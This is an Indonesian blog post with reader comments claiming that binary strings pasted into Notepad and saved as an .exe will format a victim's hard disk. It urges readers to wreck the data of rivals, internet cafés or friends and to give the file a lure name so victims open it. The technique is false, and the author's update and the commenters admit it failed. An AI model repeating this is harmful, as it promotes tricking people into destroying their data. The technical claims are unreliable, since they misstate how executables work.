Home » OS » Windows » Tips dan Trik Format Hardisk dengan Notepad

Tips dan Trik Format Hardisk dengan Notepad

Tips dan Trik Format Hardisk dengan Notepad
Tips dan Trik Format Hardisk dengan Notepad -?Ini trik jadul banget mungkin udah semua orang yang mengerti IT ( Ilmu Teknologi ) mungkin sudah mengerti semua. Mungkin bisa dibilang ini cuma sekedar catetan saja buat saya. Tetapi apabila kalian belum tahu silahkan anda lanjutkan membaca dan pelajari Tips dan trik Format Hardisk dengan Notepad.
Sebenernya ini trik dan tips Format Hardisk dengan Notepad sering digunakan untuk iseng atau merusak data – data kompi atau laptop musuh, warnet, bahkan temen sendiri kalo mau coba pake komputer sendiri aja jadi kalian ga dosa tuh. 😀
Baik langsung aja ga usah banyak omong.

    1. Format Hardisk.

[code=’css’]01001011000111110010010101010101010000011111100000[/code]

    1. Format Drive C

[code=’css’]01100110011011110111001001101101011000010111010000100000011000110011101001011100?0010000000101111010100010010111101011000[/code]

    1. Format Drive D

[code=’css’]01100110011011110111001001101101011000010111010000100000011001000011101001011100?0010000000101111010100010010111101011000[/code]

    1. Format Drive A

[code=’css’]01100110011011110111001001101101011000010111010000100000011000010011101001011100?0010000000101111010100010010111101011000[/code]
Caranya kalian ketik / copay code binary di atas ke notepad yang sudah kalian siapkan. Setelah itu save /simpan dalam bentuk .exe. Contoh sex.exe, atau apalah yang memancing korban supaya membuka file buatan kalian.
NB: Saya tidak bertanggung jawab atas kejadian yang terjadi.
UPDATE : Sudah saya coba. hasilnya ga ada reaksi alias gagal :))

No Comments

  1. iddev

    August 30, 2010 at 10:51 pm

    Wah, mantap nih..
    dicoba dulu deh

    Reply
    • admin

      August 31, 2010 at 12:49 pm

      kalo dah coba review-nya ya gan. . .

      Reply
  2. xbacktrack

    December 14, 2011 at 4:23 pm

    wah gagal om, klau bisa manta bangat tuh bos.

    Reply
    • Amri

      December 14, 2011 at 5:04 pm

      Saya juga udah coba gagal.. 😀

      Reply
  3. kelvienz

    September 8, 2013 at 1:29 pm

    yahh gagal klo bisa seru tuhhh bisa nge ilangin data kom sekolah

    Reply

Leave a Reply

Your email address will not be published.